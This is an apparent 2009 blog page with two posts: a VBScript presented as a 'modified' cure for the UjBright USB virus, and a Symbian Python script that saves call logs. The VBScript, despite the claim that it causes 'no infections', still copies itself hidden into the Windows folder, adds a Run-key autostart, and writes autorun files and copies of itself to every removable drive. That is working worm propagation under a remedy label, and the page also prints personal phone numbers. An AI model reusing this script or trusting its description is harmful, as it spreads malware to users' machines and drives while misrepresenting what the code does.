Sunday, November 8, 2009

UjBright Virus

The file UjBright_Antivirus.vbs infects the systems and changes Explorer>Menu>Tools>Folder options> and changes the file attributes to NOT show hidden files, It also disables registry editing, so that we cannot disable the virus from being active.

I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and i added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
===================

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")

Set myFile = fso.CreateTextFile(win &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

wscr.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""

If ax = false Then wscr.Run "wscript.exe """ & win &

"\UjBright_Antivirus_vbs.txt"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"

Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")

Then
Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",

true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &

"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &

"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &

vbCrLf & "shell\Open\Default=1"
auFile.close

Set auFile = fso.CreateTextFile(myFlashDrive.Path &

"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""

& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus

infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &

vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &

vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -

UJBRIGHT"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path &

"\Autorun_inf.txt")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path &

"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo

rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite

"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic

ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000
WScript.Quit

Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Posted by at No comments:
Labels:

Wednesday, November 4, 2009

Save CallLogs using python 


from __future__ import division
import logs
import appuifw
import e32
import time
fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt"
logfile = open(fn,"a")
e=['out', 'missed', 'in']
     for x in e:
       l=logs.calls(mode=x)
       for i in range(len(l)):
           dim=time.localtime(l[i]["time"])
           dateim= time.strftime("%Y/%m/%d-%H:%M:%S", dim)
           s=str(dateim)+("  M:")+str(l[i]["direction"])
           s=s+("  D:")+str(l[i]["duration"])
           s=s+("  N:")+str(l[i]["number"])
           nln=" ;"
           s=s+nln
       logfile.write( str(s)+'\n')
logfile.close()
# medzindia.blogspot.com
appuifw.note(u"log Written.  MIT....Email:imran-doc@hotmail.com,",'info')


Output:-
2009/mo/da-hh:mm:ss  M:Outgoing  N:1234567890 ;
2009/mo/da-hh:mm:ss  M:Missed call  N:1234567890 ;
2009/mo/da-hh:mm:ss  M:Incoming  N:1234567890 ;

----------------------------------------------------
comments:-
from __future__ import division
import logs
import appuifw
import e32
import time
# declare a filesystem object
# u for UNICODE format of file
# r for windows format of file
#   for binary
fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt"
# open file of the FSO 
# r to read
# w to write
# a to append
logfile = open(fn,"a")
# declare a tuple containing three parameters / mode-variables
e=['out', 'missed', 'in']
# loop through for each mode as outgoing, missed and incoming calls
# x changes to out, missed and in cyclically as declared in e
# for x in e: is executed thrice
for x in e:
# declare log of calls with each mode cyclically starting with outgoing
l=logs.calls(mode=x)
#for each of the three modes loop till the mode(e.g. outgoing) list ends 
for i in range(len(l)):
# for each entry in log, convert the time in seconds since 1970(UTC) to localtime
dim=time.localtime(l[i]["time"])
# convert the dim tuple to standard format with strftime
dateim= time.strftime("%Y/%m/%d-%H:%M:%S", dim)
# store the formatted localtime to a string s, add alphabet M and add direction
# of call as outgoing/missed/incoming
# otherwise we can use the value of x as declared in for x in e:
s=str(dateim)+("  M:")+str(l[i]["direction"])
# the duration of the call
s=s+("  D:")+str(l[i]["duration"])
# the number called (second party) preceeded by Alph N:
s=s+("  N:")+str(l[i]["number"])
# a semicolon so that you can parse the final file to a database
nln=" ;"
# finalize the value of string s
s=s+nln
# write string s to the file along with a newline
logfile.write( str(s)+'\n')
# for the first run the loop 'for x in e:' ends and begins with next value of x
# 'for x in e:' ends with three runs
# close the file
logfile.close()
# medzindia.blogspot.com
# flash a 'info' note on the screen, UNICODE 'u' 
appuifw.note(u"log Written.  MIT....Email:imran-doc@hotmail.com,",'info')

Posted by at No comments:
Labels:
Subscribe to: Comments (Atom)